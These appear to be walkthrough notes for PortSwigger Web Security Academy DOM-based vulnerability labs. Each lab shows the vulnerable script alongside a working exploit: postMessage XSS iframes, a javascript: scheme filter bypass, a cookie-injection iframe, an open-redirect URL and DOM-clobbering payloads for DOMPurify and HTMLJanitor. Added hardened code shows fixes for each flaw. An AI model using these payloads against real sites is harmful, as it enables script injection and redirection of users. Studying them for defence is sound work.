
DOM-based vulnerabilities

https://portswigger.net/web-security/dom-based

Lab: DOM XSS using web messages

This lab demonstrates a simple web message vulnerability.

GET / HTTP/1.1

In response:
<script>
window.addEventListener('message', function(e) {
	document.getElementById('ads').innerHTML = e.data;
})
</script>

Exploit Server ->

Body:

    <iframe src="https://ac461f1a1fcc394cc0502b2f003b0077.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

Lab: DOM XSS using web messages and a JavaScript URL

This lab demonstrates a DOM-based redirection vulnerability that is triggered by web messaging.

GET / HTTP/1.1

In response:
<script>
window.addEventListener('message', function(e) {
	var url = e.data;
	if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
		location.href = url;
	}
}, false);
</script>

Exploit Server ->

Body:

    <iframe src="https://ac821f511ffa44f6c1acd3b900920030.web-security-academy.net" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">

Lab: DOM XSS using web messages and JSON.parse

This lab uses web messaging and parses the message as JSON.

GET / HTTP/1.1

In response:
<script>
window.addEventListener('message', function(e) {
	var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
	document.body.appendChild(iframe);
	try {
		 d = JSON.parse(e.data);
	} 
	catch(e) {
		return;
	}
	switch(d.type) {
		case "page-load":
			ACMEplayer.element.scrollIntoView();
			break;
		case "load-channel":
			ACMEplayer.element.src = d.url;
			break;
		case "player-height-changed":
			ACMEplayer.element.style.width = d.width + "px";
			ACMEplayer.element.style.height = d.height + "px";
			break;
		}
}, false);
</script>

Exploit Server ->

Body:

    <iframe src="https://acfe1f531fae1d58c0ec34ec001300cd.web-security-academy.net" onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>
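The three message listeners above share one root cause: none of them checks `e.origin`, so any page that can frame the site may post into them, and each then routes the string into a dangerous sink (`innerHTML`, `location.href` behind a substring test, `iframe.src` behind `JSON.parse`). The following is an added example, not code from the page or from PortSwigger's lab code, of one handler hardened against all three. It assumes a single trusted sender origin `https://trusted-partner.example`, keeps the lab's JSON message types, and adds a hypothetical `ad-text` type to stand in for the first lab's ad slot; the `ads` and `player` element ids are also assumptions.

```javascript
// Added example (not from the original page or PortSwigger's lab code):
// one "message" handler hardened against the three sinks seen in these labs.
// Assumptions: only https://trusted-partner.example may post to us; message
// types mirror the lab's JSON handler plus a hypothetical "ad-text" type.
const ALLOWED_ORIGINS = new Set(['https://trusted-partner.example']);

// Decide navigability by *parsing* the URL and reading its scheme. The lab's
// indexOf('https:') substring test accepted "javascript:print()//https:".
function isHttpUrl(candidate) {
  let parsed;
  try {
    parsed = new URL(String(candidate)); // relative URLs throw and are rejected
  } catch {
    return false;
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}

// Validate an incoming message; returns a normalized action, or null to drop it.
function validateMessage(origin, data) {
  if (!ALLOWED_ORIGINS.has(origin)) return null; // the check all three labs lacked
  let d;
  try {
    d = typeof data === 'string' ? JSON.parse(data) : data;
  } catch {
    return null; // a raw HTML string like "<img src=1 onerror=print()>" stops here
  }
  if (!d || typeof d !== 'object') return null;
  switch (d.type) {
    case 'page-load':
      return { type: 'page-load' };
    case 'ad-text': // replaces the lab's innerHTML sink with plain text
      return typeof d.text === 'string' ? { type: 'ad-text', text: d.text } : null;
    case 'load-channel': // location / iframe.src sink: scheme-checked, re-serialized
      return isHttpUrl(d.url) ? { type: 'load-channel', url: new URL(d.url).href } : null;
    case 'player-height-changed': {
      const width = Number(d.width);
      const height = Number(d.height);
      if (!Number.isFinite(width) || !Number.isFinite(height)) return null;
      return { type: 'player-height-changed', width, height };
    }
    default:
      return null;
  }
}

// Apply a validated action using sinks that never parse HTML.
function applyAction(action, adsElement, playerFrame) {
  if (!action) return false;
  switch (action.type) {
    case 'page-load':
      if (playerFrame && playerFrame.scrollIntoView) playerFrame.scrollIntoView();
      break;
    case 'ad-text':
      adsElement.textContent = action.text; // textContent, not innerHTML
      break;
    case 'load-channel':
      playerFrame.src = action.url;
      break;
    case 'player-height-changed':
      playerFrame.style.width = action.width + 'px';
      playerFrame.style.height = action.height + 'px';
      break;
  }
  return true;
}

// Browser wiring; skipped when the file runs under Node.
if (typeof window !== 'undefined') {
  window.addEventListener('message', (e) => {
    const action = validateMessage(e.origin, e.data);
    applyAction(action, document.getElementById('ads'), document.getElementById('player'));
  }, false);
}
```

The origin allowlist alone defeats the `postMessage(..., '*')` exploit bodies above; the parsed-scheme check and `textContent` sink are there so that a compromised or buggy trusted sender still cannot reach script execution.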

Lab: DOM-based open redirection

This lab contains a DOM-based open-redirection vulnerability.

GET /post?postId=10 HTTP/1.1

In response:
<div class="is-linkback">
	<a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = "/"'>Back to Blog</a>
</div>

https://ac501f101ef6a935c0bc968a006300ba.web-security-academy.net/post?postId=10&url=https://exploit-ac7a1f721edea978c0ad96c001130002.web-security-academy.net/
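The `Back to Blog` handler above trusts any `url=` parameter that merely starts with `http://` or `https://`, so it will happily send the visitor to the exploit server. As an added example (not the page's or the lab's code), here is a replacement that only ever navigates within the site's own origin. It takes the current page URL as a string so it can run outside a browser; in the page you would call it with `location.href` and assign the result to `location.href`. The host names in the comments and test are constructed.

```javascript
// Added example (not from the original page or the lab): a same-origin-only
// "back" URL resolver. Input: the current page URL (location.href in a browser).
function safeBackUrl(currentHref) {
  const current = new URL(currentHref);
  // Read the parameter with a real query parser instead of a regex over the
  // whole location string.
  const candidate = current.searchParams.get('url');
  if (!candidate) return '/';
  let target;
  try {
    target = new URL(candidate, current.origin); // relative paths resolve to this site
  } catch {
    return '/';
  }
  // Cross-origin targets, protocol-relative //host URLs and javascript:/data:
  // schemes all fail here: their origin is either another site or "null".
  if (target.origin !== current.origin) return '/';
  // Return a path rather than an absolute URL so the browser cannot be handed
  // anything but a location on this origin.
  return target.pathname + target.search + target.hash;
}
```

Comparing parsed origins is the whole check; no prefix, substring or regex test on the raw string is involved, which is what made the original bypassable.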

Lab: DOM-based cookie manipulation

This lab demonstrates DOM-based client-side cookie manipulation. To solve this lab, inject a cookie that will cause XSS on a different page and call the print() function. You will need to use the exploit server to direct the victim to the correct pages.

GET /product?productId=1 HTTP/1.1

In response:
<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>

---------

GET / HTTP/1.1
Cookie: session=eIHQNBt0MBawwB6U4VNkeUhA1qJO35FX; lastViewedProduct=https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1

In response:
<a href='https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1'>Last viewed product</a><p>|</p>
<a id=x tabindex=1 onfocus=alert(1)></a>

https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1&' id=x tabindex=1 onfocus=print() random='value'>#x\

Exploit Server ->

Body:

    <iframe src="https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1&' id=x tabindex=1 onfocus=print() random='value" onload='window.location.replace("https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/#x");'>
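Two separate defects make this lab work: the product page writes the raw `window.location` (attacker-controlled query and all) into a cookie, and the home page reflects that cookie verbatim inside a single-quoted `href`. As an added example (not the page's or the lab's code), the functions below fix both ends. They assume the cookie name `lastViewedProduct` from the lab and that only `/product?productId=<digits>` is worth remembering; `https://site.example` is a constructed origin. The server-side rendering step is written in JavaScript only so that the whole file runs as one test.

```javascript
// Added example (not from the original page or the lab's code).
// Client side: store a vetted, percent-encoded same-origin path instead of the
// raw location string that carried the attacker's query tail.
function lastViewedCookieValue(href, origin) {
  let u;
  try {
    u = new URL(href, origin);
  } catch {
    return null;
  }
  if (u.origin !== origin) return null;
  if (u.pathname !== '/product') return null;
  const productId = u.searchParams.get('productId');
  if (!/^\d+$/.test(productId || '')) return null; // every other query key is dropped
  return encodeURIComponent(`/product?productId=${productId}`);
}

// Server side (hypothetical rendering helper): HTML-attribute-encode whatever
// is reflected into href='...'. The lab reflected the cookie as-is, so a single
// quote closed the attribute and "id=x tabindex=1 onfocus=print()" followed.
function escapeAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderLastViewedLink(cookieValue) {
  if (!cookieValue) return '';
  let decoded;
  try {
    decoded = decodeURIComponent(cookieValue);
  } catch {
    return ''; // malformed percent-encoding: render nothing rather than guess
  }
  return `<a href='${escapeAttr(decoded)}'>Last viewed product</a>`;
}

// Browser wiring for the product page; skipped under Node.
if (typeof window !== 'undefined') {
  const value = lastViewedCookieValue(window.location.href, window.location.origin);
  if (value) document.cookie = 'lastViewedProduct=' + value + '; SameSite=None; Secure';
}
```

Either fix alone closes this particular lab; both together are the right shape, because the cookie can also be set by other means (a sibling subdomain, a browser extension) and the reflecting page should not depend on the writer having been careful.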

Lab: Exploiting DOM clobbering to enable XSS

This lab contains a DOM-clobbering vulnerability. The comment functionality allows "safe" HTML.

GET /post?postId=9 HTTP/1.1

In response:
<script src='resources/js/domPurify-2.0.15.js'></script>
<script src='resources/js/loadCommentsWithDomClobbering.js'></script>

Post a comment with this:

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">

Post another random comment and the XSS will be executed.

{avatar: 'cid:"onerror=alert(1)//'}

Lab: Clobbering DOM attributes to bypass HTML filters

This lab uses the HTMLJanitor library, which is vulnerable to DOM clobbering. To solve this lab, construct a vector that bypasses the filter and uses DOM clobbering to inject a vector that calls the print() function.

GET /post?postId=8 HTTP/1.1

In response:
<script src='resources/js/htmlJanitor.js'></script>
<script src='resources/js/loadCommentsWithHtmlJanitor.js'></script>

Post a comment with this:

<form id=x tabindex=0 onfocus=print()><input id=attributes>

Exploit Server ->

Body:

    <iframe src="https://ac9e1fcc1f0a47dec05e09ac00c900d1.web-security-academy.net/post?postId=9" onload="setTimeout(()=>this.src=this.src+'#x',500)"></iframe>
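Both clobbering labs above hinge on JavaScript that reads a property which an attacker-controlled element can shadow: in the DOMPurify lab a global config object (`window.defaultAvatar` and its `.avatar`), in the HTMLJanitor lab the sanitizer's own property access on a node, and in the first case the result is then concatenated into an HTML string without encoding. As an added example (not the page's code, nor DOMPurify's or HTMLJanitor's), the following puts the vulnerable fallback pattern next to a hardened one. Because a real DOM is not available outside a browser, `clobberedWindow` is a constructed stand-in for what `<a id=defaultAvatar>` and `<a name=avatar href=...>` become (an anchor's `toString()` returns its `href`); `https://site.example` and the default avatar path are assumptions.

```javascript
// Added example (not from the original page, DOMPurify or HTMLJanitor).
// Constructed stand-in for window after the clobbering comment is rendered:
// both "objects" are really elements, and the inner one stringifies to its href.
const clobberedWindow = {
  defaultAvatar: {
    nodeType: 1,
    avatar: { nodeType: 1, toString() { return 'cid:"onerror=alert(1)//'; } },
  },
};
const SITE_ORIGIN = 'https://site.example'; // assumption
const DEFAULT_AVATAR = '/resources/images/avatarDefault.svg'; // assumption

// Vulnerable pattern: a global "config" object with a || fallback, read into a
// string-built tag. Any element with id=defaultAvatar satisfies the || test,
// and the attacker's quote character is never encoded.
function avatarUrlVulnerable(win) {
  const defaultAvatar = win.defaultAvatar || { avatar: DEFAULT_AVATAR };
  return '<img src="' + defaultAvatar.avatar + '">';
}

// Hardened, part 1: accept configuration only from a plain object with string
// fields. A clobbered global is an HTMLElement or HTMLCollection: its prototype
// is not Object.prototype and it carries nodeType, so it falls through.
function isPlainObject(v) {
  return v !== null && typeof v === 'object' &&
    Object.getPrototypeOf(v) === Object.prototype && !('nodeType' in v);
}
function readConfig(win, name, fallback) {
  const candidate = win[name];
  if (!isPlainObject(candidate)) return fallback;
  for (const key of Object.keys(fallback)) {
    if (typeof candidate[key] !== 'string') return fallback;
  }
  return candidate;
}

// Hardened, part 2: only http(s) or same-origin paths may become an image
// source, and the value is re-serialized by the URL parser, which percent-
// encodes the characters (", <, >) that could break out of the attribute.
function normalizeImageSrc(src, origin) {
  if (typeof src !== 'string') return null;
  let u;
  try {
    u = new URL(src, origin);
  } catch {
    return null;
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null; // cid:, javascript:, data: rejected
  return u.origin === origin ? u.pathname + u.search : u.href;
}

function avatarUrlHardened(win) {
  const cfg = readConfig(win, 'defaultAvatar', { avatar: DEFAULT_AVATAR });
  const src = normalizeImageSrc(cfg.avatar, SITE_ORIGIN) || DEFAULT_AVATAR;
  return '<img src="' + src + '">';
}
```

In a real page, prefer `document.createElement('img')` plus `setAttribute('src', ...)` over any string concatenation at all. The same rule covers the HTMLJanitor lab: a sanitizer must not trust `node.attributes` (or any other property) read directly off a node the attacker can give a named child; reaching the native accessor via `Object.getOwnPropertyDescriptor(Element.prototype, 'attributes').get.call(node)` is the usual workaround.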

Last updated 3 years ago